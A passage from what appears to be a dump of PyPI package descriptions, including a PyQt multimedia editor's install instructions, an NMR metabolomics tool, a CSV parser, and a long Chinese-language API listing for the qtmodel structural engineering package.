documentation:https://jdhp.gitlab.io/qtmeExamples:https://jdhp.gitlab.io/qtme/gallery/Notebooks:https://gitlab.com/jdhp/qt-multimedia-editor-notebooksSource code:https://gitlab.com/jdhp/qt-multimedia-editorIssue tracker:https://gitlab.com/jdhp/qt-multimedia-editor/issuesPytest code coverage:https://jdhp.gitlab.io/qtme/htmlcov/index.htmlQt Multimedia Editor on PyPI:https://pypi.org/project/qtmeQt Multimedia Editor on Anaconda Cloud:https://anaconda.org/jdhp/qtmeDescriptionMultimedia editor for PyQt/PySideNote:This project is still in beta stage, so the API is not finalized yet.DependenciesC.f. requirements.txtInstallationPosix (Linux, MacOSX, WSL, \u2026)From the Qt Multimedia Editor source code:conda deactivate # Only if you use Anaconda...\npython3 -m venv env\nsource env/bin/activate\npython3 -m pip install --upgrade pip\npython3 -m pip install -r requirements.txt\npython3 setup.py developWindowsFrom the Qt Multimedia Editor source code:conda deactivate # Only if you use Anaconda...\npython3 -m venv env\nenv\\Scripts\\activate.bat\npython3 -m pip install --upgrade pip\npython3 -m pip install -r requirements.txt\npython3 setup.py developDocumentationOnline documentation:https://jdhp.gitlab.io/qtmeAPI documentation:https://jdhp.gitlab.io/qtme/api.htmlExample usageExamples:https://jdhp.gitlab.io/qtme/gallery/Build and run the Python Docker imageBuild the docker imageFrom the Qt Multimedia Editor source code:docker build -t qtme:latest .Run unit tests from the docker containerFrom the Qt Multimedia Editor source code:docker run qtme pytestRun an example from the docker containerFrom the Qt Multimedia Editor source code:docker run qtme python3 /app/examples/hello.pyBug reportsTo search for bugs or report them, please use the Qt Multimedia Editor Bug Tracker at:https://gitlab.com/jdhp/qt-multimedia-editor/issuesLicenseThis project is provided under the terms and conditions of theMIT License."} +{"package": "qt-messenger-client", "pacakge-description": "No description available on PyPI."} +{"package": "qt-messenger-server", "pacakge-description": "No description available on PyPI."} +{"package": "qtmetabolabpy", "pacakge-description": "Python package to process 1D and 2D NMR spectroscopic data for metabolomics and tracer based metabolism analysisDocumentation:https://ludwigc.github.io/metabolabpySource:https://github.com/ludwigc/MetaboLabPyBug reports:https://github.com/ludwigc/MetaboLabPy/issuesInstallationSee 
theInstallation pageof\ntheonline documentation.Command line$ metabolabpy --helpBugsPlease report any bugs that you findhere.\nOr fork the repository onGitHuband create a pull request (PR). We welcome all contributions, and we\nwill help you to make the PR if you are new togit.Developers & ContributorsChristian Ludwig (C.Ludwig@bham.ac.uk) -University of Birmingham (UK)LicenseReleased under the GNU General Public License v3.0 (seeLICENSE file)"} +{"package": "qtmimport", "pacakge-description": "QTMimportThis small module opens data files generated by the QTMtoolbox (.csv format) and parses the data into a single object (class).\nEach variable that was measured is an attribute of this class, and contains the header name, data, etc.DependenciesThis module usesnumpy.UsageTo import the module, usefrom qtmimport import qtmimportThen, to parse data, usedata_object = qtmimport.parse_data(filename)Thedata_objectwill contain data in the following form:Data structure:\n \n list QTMdata:\n |\n |--> class \"variable\"\n |\n |--> index (must be unique!)\n |\n |--> header name (not unique, e.g. for when \n | you both sweep and read a variable)\n |\n |--> data array \n\t\t\t\t|--> variable type (s = SETpoint, g = GET value (measured value))"} +{"package": "qtML", "pacakge-description": "\u5a34\u5b2d\u762f"} +{"package": "qtmodel", "pacakge-description": "\u521d\u59cb\u5316\u6a21\u578binitial\u521d\u59cb\u5316\u6a21\u578bReturns: \u65e0\u8282\u70b9\u5355\u5143\u64cd\u4f5cadd_structure_group\u6dfb\u52a0\u7ed3\u6784\u7ec4Args:name: \u7ed3\u6784\u7ec4\u540dindex: \u7ed3\u6784\u7ec4\u7f16\u53f7(\u975e\u5fc5\u987b\u53c2\u6570)\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u5f53\u524d\u7f16\u53f7Returns: \u65e0remove_structure_group\u53ef\u6839\u636e\u7ed3\u6784\u4e0e\u7ec4\u540d\u6216\u7ed3\u6784\u7ec4\u7f16\u53f7\u5220\u9664\u7ed3\u6784\u7ec4\uff0c\u5f53\u7ec4\u540d\u548c\u7ec4\u7f16\u53f7\u5747\u4e3a\u9ed8\u8ba4\u5219\u5220\u9664\u6240\u6709\u7ed3\u6784\u7ec4Args:name:\u7ed3\u6784\u7ec4\u540d\u79f0index:\u7ed3\u6784\u7ec4\u7f16\u53f7Returns: \u65e0add_structure_to_group\u4e3a\u7ed3\u6784\u7ec4\u6dfb\u52a0\u8282\u70b9\u548c/\u6216\u5355\u5143Args:name: \u7ed3\u6784\u7ec4\u540dnode_ids: \u8282\u70b9\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)element_ids: \u5355\u5143\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)Returns: \u65e0remove_structure_in_group\u4e3a\u7ed3\u6784\u7ec4\u5220\u9664\u8282\u70b9\u548c/\u6216\u5355\u5143Args:name: \u7ed3\u6784\u7ec4\u540dnode_ids: \u8282\u70b9\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)element_ids: \u5355\u5143\u7f16\u53f7\u5217\u8868(\u53ef\u9009\u53c2\u6570)Returns: \u65e0add_node\u6839\u636e\u5750\u6807\u4fe1\u606f\u548c\u8282\u70b9\u7f16\u53f7\u6dfb\u52a0\u8282\u70b9\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u7f16\u53f7Args:x: \u8282\u70b9\u5750\u6807xy: \u8282\u70b9\u5750\u6807yz: \u8282\u70b9\u5750\u6807zindex: \u8282\u70b9\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u7f16\u53f7 (\u53ef\u9009\u53c2\u6570)Returns:\u65e0add_nodes\u6dfb\u52a0\u591a\u4e2a\u8282\u70b9\uff0c\u53ef\u4ee5\u9009\u62e9\u6307\u5b9a\u8282\u70b9\u7f16\u53f7Args:node_list:\u8282\u70b9\u5750\u6807\u4fe1\u606f [[x1,y1,z1],...]\u6216 [[id1,x1,y1,z1]...]Returns: \u65e0remove_node\u5220\u9664\u6307\u5b9a\u8282\u70b9Args:index:\u8282\u70b9\u7f16\u53f7Returns: \u65e0add_element\u6839\u636e\u5355\u5143\u7f16\u53f7\u548c\u5355\u5143\u7c7b\u578b\u6dfb\u52a0\u5355\u5143Args:index:\u5355\u5143\u7f16\u53f7ele_type:\u5355\u5143\u7c7b\u578b 1-\u6881 2-\u7d22 3-\u6746 
4-\u677fnode_ids:\u5355\u5143\u5bf9\u5e94\u7684\u8282\u70b9\u5217\u8868 [i,j] \u6216 [i,j,k,l]beta_angle:\u8d1d\u5854\u89d2mat_id:\u6750\u6599\u7f16\u53f7sec_id:\u622a\u9762\u7f16\u53f7Returns: \u65e0remove_element\u5220\u9664\u6307\u5b9a\u7f16\u53f7\u7684\u5355\u5143Args:index: \u5355\u5143\u7f16\u53f7,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u5355\u5143Returns: \u65e0\u6750\u6599\u64cd\u4f5cadd_material\u6dfb\u52a0\u6750\u6599Args:index:\u6750\u6599\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)name:\u6750\u6599\u540d\u79f0material_type: \u6750\u6599\u7c7b\u578bstandard_name:\u89c4\u8303\u540d\u79f0database:\u6570\u636e\u5e93construct_factor:\u6784\u9020\u7cfb\u6570modified:\u662f\u5426\u4fee\u6539\u9ed8\u8ba4\u6750\u6599\u53c2\u6570,\u9ed8\u8ba4\u4e0d\u4fee\u6539 (\u53ef\u9009\u53c2\u6570)modify_info:\u6750\u6599\u53c2\u6570\u5217\u8868[\u5f39\u6027\u6a21\u91cf,\u5bb9\u91cd,\u6cca\u677e\u6bd4,\u70ed\u81a8\u80c0\u7cfb\u6570] (\u53ef\u9009\u53c2\u6570)Returns: \u65e0add_time_material\u6dfb\u52a0\u6536\u7f29\u5f90\u53d8\u6750\u6599Args:index: \u6536\u7f29\u5f90\u53d8\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)name: \u6536\u7f29\u5f90\u53d8\u540dcode_index: \u6536\u7f29\u5f90\u53d8\u89c4\u8303\u7d22\u5f15time_parameter: \u5bf9\u5e94\u89c4\u8303\u7684\u6536\u7f29\u5f90\u53d8\u53c2\u6570\u5217\u8868,\u9ed8\u8ba4\u4e0d\u6539\u53d8\u89c4\u8303\u4e2d\u4fe1\u606f (\u53ef\u9009\u53c2\u6570)Returns:\u65e0update_material_creep\u5c06\u6536\u7f29\u5f90\u53d8\u53c2\u6570\u8fde\u63a5\u5230\u6750\u6599Args:index: \u6750\u6599\u7f16\u53f7creep_id: \u6536\u7f29\u5f90\u53d8\u7f16\u53f7f_cuk: \u6750\u6599\u6807\u51c6\u6297\u538b\u5f3a\u5ea6,\u4ec5\u81ea\u5b9a\u4e49\u6750\u6599\u662f\u9700\u8981\u8f93\u5165Returns: \u65e0remove_material\u5220\u9664\u6307\u5b9a\u6750\u6599Args:index:\u6750\u6599\u7f16\u53f7\uff0c\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u6750\u6599Returns: \u65e0\u622a\u9762\u548c\u677f\u539a\u64cd\u4f5cadd_section\u6dfb\u52a0\u622a\u9762\u4fe1\u606fArgs:index: \u622a\u9762\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bname:\u622a\u9762\u540d\u79f0section_type:\u622a\u9762\u7c7b\u578bsection_info:\u622a\u9762\u4fe1\u606f (\u5fc5\u8981\u53c2\u6570)bias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0add_single_box\u6dfb\u52a0\u5355\u9879\u591a\u5ba4\u6df7\u51dd\u571f\u622a\u9762Args:index:\u622a\u9762\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bname:\u622a\u9762\u540d\u79f0n:\u7bb1\u5ba4\u6570\u91cfh:\u622a\u9762\u9ad8\u5ea6section_info:\u622a\u9762\u4fe1\u606fcharm_info:\u622a\u9762\u5012\u89d2section_info2:\u53f3\u534a\u5ba4\u622a\u9762\u4fe1\u606fcharm_info2:\u53f3\u534a\u5ba4\u622a\u9762\u5012\u89d2bias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: 
\u65e0add_steel_section\u6dfb\u52a0\u94a2\u6881\u622a\u9762,\u5305\u62ec\u53c2\u6570\u578b\u94a2\u6881\u622a\u9762\u548c\u81ea\u5b9a\u4e49\u5e26\u808b\u94a2\u6881\u622a\u9762Args:index:name:section_type:\u622a\u9762\u7c7b\u578bsection_info:\u622a\u9762\u4fe1\u606frib_info:\u808b\u677f\u4fe1\u606frib_place:\u808b\u677f\u4f4d\u7f6ebias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0add_user_section\u6dfb\u52a0\u81ea\u5b9a\u4e49\u622a\u9762,\u76ee\u524d\u4ec5\u652f\u6301\u7279\u6027\u622a\u9762Args:index:\u622a\u9762\u7f16\u53f7name:\u622a\u9762\u540d\u79f0section_type:\u622a\u9762\u7c7b\u578bproperty_info:\u622a\u9762\u7279\u6027\u5217\u8868Returns: \u65e0add_tapper_section\u6dfb\u52a0\u53d8\u622a\u9762,\u9700\u5148\u5efa\u7acb\u5355\u4e00\u622a\u9762Args:index:\u622a\u9762\u7f16\u53f7name:\u622a\u9762\u540d\u79f0begin_id:\u622a\u9762\u59cb\u7aef\u7f16\u53f7end_id:\u622a\u9762\u672b\u7aef\u7f16\u53f7vary_info:\u622a\u9762\u53d8\u5316\u4fe1\u606fReturns: \u65e0remove_section\u5220\u9664\u622a\u9762\u4fe1\u606fArgs:index: \u622a\u9762\u7f16\u53f7,\u53c2\u6570\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u5168\u90e8\u622a\u9762Returns: \u65e0add_thickness\u6dfb\u52a0\u677f\u539aArgs:index: \u677f\u539aidname: \u677f\u539a\u540d\u79f0t: \u677f\u539a\u5ea6thick_type: \u677f\u539a\u7c7b\u578b 0-\u666e\u901a\u677f 1-\u52a0\u52b2\u808b\u677fbias_info: \u9ed8\u8ba4\u4e0d\u504f\u5fc3,\u504f\u5fc3\u65f6\u8f93\u5165\u5217\u8868[type,value] type:0-\u539a\u5ea6\u6bd4 1-\u6570\u503crib_pos:\u808b\u677f\u4f4d\u7f6edist_v:\u7eb5\u5411\u622a\u9762\u808b\u677f\u95f4\u8ddddist_l:\u6a2a\u5411\u622a\u9762\u808b\u677f\u95f4\u8dddrib_v:\u7eb5\u5411\u808b\u677f\u4fe1\u606frib_l:\u6a2a\u5411\u808b\u677f\u4fe1\u606fReturns: \u65e0remove_thickness\u5220\u9664\u677f\u539aArgs:index:\u677f\u539a\u7f16\u53f7,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u677f\u539a\u4fe1\u606fReturns: \u65e0add_tapper_section_group\u6dfb\u52a0\u53d8\u622a\u9762\u7ec4Args:ids:\u53d8\u622a\u9762\u7ec4\u7f16\u53f7name: \u53d8\u622a\u9762\u7ec4\u540dfactor_w: \u5bbd\u5ea6\u65b9\u5411\u53d8\u5316\u9636\u6570 \u7ebf\u6027(1.0) \u975e\u7ebf\u6027(!=1.0)factor_h: \u9ad8\u5ea6\u65b9\u5411\u53d8\u5316\u9636\u6570 \u7ebf\u6027(1.0) \u975e\u7ebf\u6027(!=1.0)ref_w: \u5bbd\u5ea6\u65b9\u5411\u53c2\u8003\u70b9 0-i 1-jref_h: \u9ad8\u5ea6\u65b9\u5411\u53c2\u8003\u70b9 0-i 1-jdis_w: \u5bbd\u5ea6\u65b9\u5411\u95f4\u8ddddis_h: \u9ad8\u5ea6\u65b9\u5411\u95f4\u8dddReturns: \u65e0update_section_bias\u66f4\u65b0\u622a\u9762\u504f\u5fc3Args:index:\u622a\u9762\u7f16\u53f7bias_type:\u504f\u5fc3\u7c7b\u578bcenter_type:\u4e2d\u5fc3\u7c7b\u578bshear_consider:\u8003\u8651\u526a\u5207bias_point:\u81ea\u5b9a\u4e49\u504f\u5fc3\u70b9(\u4ec5\u81ea\u5b9a\u4e49\u7c7b\u578b\u504f\u5fc3\u9700\u8981)Returns: \u65e0\u8fb9\u754c\u64cd\u4f5cadd_boundary_group\u65b0\u5efa\u8fb9\u754c\u7ec4Args:name:\u8fb9\u754c\u7ec4\u540dindex:\u8fb9\u754c\u7ec4\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b\u5f53\u524d\u7f16\u53f7 (\u53ef\u9009\u53c2\u6570)Returns: \u65e0remove_boundary_group\u6309\u7167\u540d\u79f0\u5220\u9664\u8fb9\u754c\u7ec4Args:name: \u8fb9\u754c\u7ec4\u540d\u79f0\uff0c\u9ed8\u8ba4\u5220\u9664\u6240\u6709\u8fb9\u754c\u7ec4 (\u975e\u5fc5\u987b\u53c2\u6570)Returns: 
\u65e0remove_boundary\u6839\u636e\u8fb9\u754c\u7ec4\u540d\u79f0\u3001\u8fb9\u754c\u7684\u7c7b\u578b\u548c\u7f16\u53f7\u5220\u9664\u8fb9\u754c\u4fe1\u606f,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u8fb9\u754c\u4fe1\u606fArgs:group_name: \u8fb9\u754c\u7ec4\u540dboundary_type: \u8fb9\u754c\u7c7b\u578bindex: \u8fb9\u754c\u7f16\u53f7Returns: \u65e0add_general_support\u6dfb\u52a0\u4e00\u822c\u652f\u627fArgs:index:\u8fb9\u754c\u7f16\u53f7node_id:\u8282\u70b9\u7f16\u53f7boundary_info:\u8fb9\u754c\u4fe1\u606f\uff0c\u4f8b\u5982[X,Y,Z,Rx,Ry,Rz] 1-\u56fa\u5b9a 0-\u81ea\u7531group_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_elastic_support\u6dfb\u52a0\u5f39\u6027\u652f\u627fArgs:index:\u7f16\u53f7node_id:\u8282\u70b9\u7f16\u53f7support_type:\u652f\u627f\u7c7b\u578bboundary_info:\u8fb9\u754c\u4fe1\u606fgroup_name:\u8fb9\u754c\u7ec4Returns: \u65e0add_master_slave_link\u6dfb\u52a0\u4e3b\u4ece\u7ea6\u675fArgs:index:\u7f16\u53f7master_id:\u4e3b\u8282\u70b9\u53f7slave_id:\u4ece\u8282\u70b9\u53f7boundary_info:\u8fb9\u754c\u4fe1\u606fgroup_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_elastic_link\u6dfb\u52a0\u5f39\u6027\u8fde\u63a5Args:index:\u8282\u70b9\u7f16\u53f7link_type:\u8282\u70b9\u7c7b\u578bstart_id:\u8d77\u59cb\u8282\u70b9\u53f7end_id:\u7ec8\u8282\u70b9\u53f7beta_angle:\u8d1d\u5854\u89d2boundary_info:\u8fb9\u754c\u4fe1\u606fgroup_name:\u8fb9\u754c\u7ec4\u540ddis_ratio:\u8ddd\u79bb\u6bd4kx:\u521a\u5ea6Returns: \u65e0add_beam_constraint\u6dfb\u52a0\u6881\u7aef\u7ea6\u675fArgs:index:\u7ea6\u675f\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bbeam_id:\u6881\u53f7info_i:i\u7aef\u7ea6\u675f\u4fe1\u606f [IsFreedX,IsFreedY,IsFreedZ,IsFreedRX,IsFreedRY,IsFreedRZ]info_j:j\u7aef\u7ea6\u675f\u4fe1\u606f [IsFreedX,IsFreedY,IsFreedZ,IsFreedRX,IsFreedRY,IsFreedRZ]group_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0add_node_axis\u6dfb\u52a0\u8282\u70b9\u5750\u6807Args:index:\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522binput_type:\u8f93\u5165\u65b9\u5f0fnode_id:\u8282\u70b9\u53f7coord_info:\u5c40\u90e8\u5750\u6807\u4fe1\u606f -List(\u89d2) -List(\u4e09\u70b9/\u5411\u91cf)Returns: \u65e0\u79fb\u52a8\u8377\u8f7dadd_standard_vehicle\u6dfb\u52a0\u6807\u51c6\u8f66\u8f86Args:name:\u8f66\u8f86\u8377\u8f7d\u540d\u79f0standard_code:\u8377\u8f7d\u89c4\u8303load_type:\u8377\u8f7d\u7c7b\u578bload_length:\u8377\u8f7d\u957f\u5ea6n:\u8f66\u53a2\u6570Returns: \u65e0add_node_tandem\u6dfb\u52a0\u8282\u70b9\u7eb5\u5217Args:name:\u8282\u70b9\u7eb5\u5217\u540dstart_id:\u8d77\u59cb\u8282\u70b9\u53f7node_ids:\u8282\u70b9\u5217\u8868Returns: \u65e0add_influence_plane\u6dfb\u52a0\u5f71\u54cd\u9762Args:name:\u5f71\u54cd\u9762\u540d\u79f0tandem_names:\u8282\u70b9\u7eb5\u5217\u540d\u79f0\u7ec4Returns: \u65e0add_lane_line\u6dfb\u52a0\u8f66\u9053\u7ebfArgs:name:\u8f66\u9053\u7ebf\u540d\u79f0influence_name:\u5f71\u54cd\u9762\u540d\u79f0tandem_name:\u8282\u70b9\u7eb5\u5217\u540doffset:\u504f\u79fbdirection:\u65b9\u5411Returns: \u65e0add_live_load_case\u6dfb\u52a0\u79fb\u52a8\u8377\u8f7d\u5de5\u51b5Args:name:\u8377\u8f7d\u5de5\u51b5\u540dinfluence_plane:\u5f71\u54cd\u7ebf\u540dspan:\u8de8\u5ea6sub_case:\u5b50\u5de5\u51b5\u4fe1\u606f ListReturns: \u65e0remove_vehicle\u5220\u9664\u8f66\u8f86\u4fe1\u606fArgs:index:\u8f66\u8f86\u8377\u8f7d\u7f16\u53f7Returns: \u65e0remove_node_tandem\u6309\u7167 \u8282\u70b9\u7eb5\u5217\u7f16\u53f7/\u8282\u70b9\u7eb5\u5217\u540d \u5220\u9664\u8282\u70b9\u7eb5\u5217Args:index:\u8282\u70b9\u7eb5\u5217\u7f16\u53f7name:\u8282\u70b9\u7eb5\u5217\u540dReturns: \u65e0remove_influence_plane\u6309\u7167 
\u5f71\u54cd\u9762\u7f16\u53f7/\u5f71\u54cd\u9762\u540d\u79f0 \u5220\u9664\u5f71\u54cd\u9762Args:index:\u5f71\u54cd\u9762\u7f16\u53f7name:\u5f71\u54cd\u9762\u540d\u79f0Returns: \u65e0remove_lane_line\u6309\u7167 \u8f66\u9053\u7ebf\u7f16\u53f7/\u8f66\u9053\u7ebf\u540d\u79f0 \u5220\u9664\u8f66\u9053\u7ebfArgs:name:\u8f66\u9053\u7ebf\u540d\u79f0index:\u8f66\u9053\u7ebf\u7f16\u53f7Returns: \u65e0remove_live_load_case\u5220\u9664\u79fb\u52a8\u8377\u8f7d\u5de5\u51b5Args:name:\u79fb\u52a8\u8377\u8f7d\u5de5\u51b5\u540dReturns: \u65e0\u94a2\u675f\u64cd\u4f5cadd_tendon_group\u6309\u7167\u540d\u79f0\u6dfb\u52a0\u94a2\u675f\u7ec4\uff0c\u6dfb\u52a0\u65f6\u53ef\u6307\u5b9a\u94a2\u675f\u7ec4idArgs:name: \u94a2\u675f\u7ec4\u540d\u79f0index: \u94a2\u675f\u7ec4\u7f16\u53f7(\u975e\u5fc5\u987b\u53c2\u6570)\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522bReturns: \u65e0remove_tendon_group\u6309\u7167\u94a2\u675f\u7ec4\u540d\u79f0\u6216\u94a2\u675f\u7ec4\u7f16\u53f7\u5220\u9664\u94a2\u675f\u7ec4\uff0c\u4e24\u53c2\u6570\u5747\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u94a2\u675f\u7ec4Args:name:\u94a2\u675f\u7ec4\u540d\u79f0,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)index:\u94a2\u675f\u7ec4\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)Returns: \u65e0add_tendon_property\u6dfb\u52a0\u94a2\u675f\u7279\u6027Args:name:\u94a2\u675f\u7279\u6027\u540dindex:\u94a2\u675f\u7f16\u53f7,\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)tendon_type: 0-PRE 1-POSTmaterial_id: \u94a2\u6750\u6750\u6599\u7f16\u53f7duct_type: 1-\u91d1\u5c5e\u6ce2\u7eb9\u7ba1 2-\u5851\u6599\u6ce2\u7eb9\u7ba1 3-\u94c1\u76ae\u7ba1 4-\u94a2\u7ba1 5-\u62bd\u82af\u6210\u578bsteel_type: 1-\u94a2\u7ede\u7ebf 2-\u87ba\u7eb9\u94a2\u7b4bsteel_detail: \u94a2\u7ede\u7ebf[\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570] \u87ba\u7eb9\u94a2\u7b4b[\u94a2\u7b4b\u76f4\u5f84,\u94a2\u675f\u9762\u79ef,\u5b54\u9053\u76f4\u5f84,\u6469\u963b\u7cfb\u6570,\u504f\u5dee\u7cfb\u6570,\u5f20\u62c9\u65b9\u5f0f(1-\u4e00\u6b21\u5f20\u62c9\\2-\u8d85\u5f20\u62c9)]loos_detail: \u677e\u5f1b\u4fe1\u606f[\u89c4\u8303(1-\u516c\u89c4 2-\u94c1\u89c4),\u5f20\u62c9(1-\u4e00\u6b21\u5f20\u62c9 2-\u8d85\u5f20\u62c9),\u677e\u5f1b(1-\u4e00\u822c\u677e\u5f1b 2-\u4f4e\u677e\u5f1b)] (\u4ec5\u94a2\u7ede\u7ebf\u9700\u8981)slip_info: \u6ed1\u79fb\u4fe1\u606f[\u59cb\u7aef\u8ddd\u79bb,\u672b\u7aef\u8ddd\u79bb]Returns: \u65e0add_tendon_3d\u6dfb\u52a0\u4e09\u7ef4\u94a2\u675fArgs:name:\u94a2\u675f\u540d\u79f0property_name:\u94a2\u675f\u7279\u6027\u540d\u79f0group_name:\u9ed8\u8ba4\u94a2\u675f\u7ec4num:\u6839\u6570line_type:1-\u5bfc\u7ebf\u70b9 2-\u6298\u7ebf\u70b9position_type: \u5b9a\u4f4d\u65b9\u5f0f 1-\u76f4\u7ebf 2-\u8f68\u8ff9\u7ebfcontrol_info: \u63a7\u5236\u70b9\u4fe1\u606f[[x1,y1,z1,r1],[x2,y2,z2,r2]....]point_insert: \u5b9a\u4f4d\u65b9\u5f0f\u4e3a\u76f4\u7ebf\u65f6\u4e3a\u63d2\u5165\u70b9\u5750\u6807[x,y,z], \u8f68\u8ff9\u7ebf\u65f6\u4e3a [\u63d2\u5165\u7aef(1-I 2-J),\u63d2\u5165\u65b9\u5411(1-ij 2-ji),\u63d2\u5165\u5355\u5143id]tendon_direction:\u76f4\u7ebf\u94a2\u675f\u65b9\u5411\u5411\u91cf x\u8f74-[1,0,0] y\u8f74-[0,1,0] (\u8f68\u8ff9\u7ebf\u65f6\u4e0d\u7528\u8d4b\u503c)rotation_angle:\u7ed5\u94a2\u675f\u65cb\u8f6c\u89d2\u5ea6track_group:\u8f68\u8ff9\u7ebf\u7ed3\u6784\u7ec4\u540d (\u76f4\u7ebf\u65f6\u4e0d\u7528\u8d4b\u503c)Returns: 
\u65e0remove_tendon\u6309\u7167\u540d\u79f0\u6216\u7f16\u53f7\u5220\u9664\u94a2\u675f,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u94a2\u675fArgs:name:\u94a2\u675f\u540d\u79f0index:\u94a2\u675f\u7f16\u53f7Returns: \u65e0remove_tendon_property\u6309\u7167\u540d\u79f0\u6216\u7f16\u53f7\u5220\u9664\u94a2\u675f\u7ec4,\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u94a2\u675f\u7ec4Args:name:\u94a2\u675f\u7ec4\u540d\u79f0index:\u94a2\u675f\u7ec4\u7f16\u53f7Returns: \u65e0add_nodal_mass\u6dfb\u52a0\u8282\u70b9\u8d28\u91cfArgs:node_id:\u8282\u70b9\u7f16\u53f7mass_info:[m,rmX,rmY,rmZ]Returns: \u65e0remove_nodal_mass\u5220\u9664\u8282\u70b9\u8d28\u91cfArgs:node_id:\u8282\u70b9\u53f7Returns: \u65e0add_pre_stress\u6dfb\u52a0\u9884\u5e94\u529bArgs:index:\u7f16\u53f7case_name:\u8377\u8f7d\u5de5\u51b5\u540dtendon_name:\u94a2\u675f\u540dpre_type:\u9884\u5e94\u529b\u7c7b\u578bforce:\u9884\u5e94\u529bgroup_name:\u8fb9\u754c\u7ec4Returns: \u65e0remove_pre_stress\u5220\u9664\u9884\u5e94\u529bArgs:case_name:\u8377\u8f7d\u5de5\u51b5tendon_name:\u94a2\u675f\u7ec4group_name:\u8fb9\u754c\u7ec4\u540dReturns: \u65e0\u8377\u8f7d\u64cd\u4f5cadd_load_group\u6839\u636e\u8377\u8f7d\u7ec4\u540d\u79f0\u6dfb\u52a0\u8377\u8f7d\u7ec4Args:name: \u8377\u8f7d\u7ec4\u540d\u79f0index: \u8377\u8f7d\u7ec4\u7f16\u53f7\uff0c\u9ed8\u8ba4\u81ea\u52a8\u8bc6\u522b (\u53ef\u9009\u53c2\u6570)Returns: \u65e0remove_load_group\u6839\u636e\u8377\u8f7d\u7ec4\u540d\u79f0\u6216\u8377\u8f7d\u7ec4id\u5220\u9664\u8377\u8f7d\u7ec4,\u53c2\u6570\u4e3a\u9ed8\u8ba4\u65f6\u5220\u9664\u6240\u6709\u8377\u8f7d\u7ec4Args:name: \u8377\u8f7d\u7ec4\u540d\u79f0index: \u8377\u8f7d\u7ec4\u7f16\u53f7Returns: \u65e0add_nodal_force\u6dfb\u52a0\u8282\u70b9\u8377\u8f7dcase_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7load_info:[Fx,Fy,Fz,Mx,My,Mz]group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0remove_nodal_force\u5220\u9664\u8282\u70b9\u8377\u8f7dArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7Returns: \u65e0add_node_displacement\u6dfb\u52a0\u8282\u70b9\u4f4d\u79fbArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7load_info:[Dx,Dy,Dz,Rx,Ry,Rz]group_name:\u8377\u8f7d\u7ec4\u540dReturns: \u65e0remove_nodal_displacement\u5220\u9664\u8282\u70b9\u4f4d\u79fbArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dnode_id:\u8282\u70b9\u7f16\u53f7Returns: \u65e0add_beam_load\u6dfb\u52a0\u6881\u5355\u5143\u8377\u8f7dArgs:case_name:\u8377\u8f7d\u5de5\u51b5\u540dbeam_id:\u5355\u5143\u7f16\u53f7load_type:\u8377\u8f7d\u7c7b\u578bcoord_system:\u5750\u6807\u7cfbload_info:\u8377\u8f7d\u4fe1\u606fgroup_name:\u8377\u8f7d\u7ec4\u540dReturns: 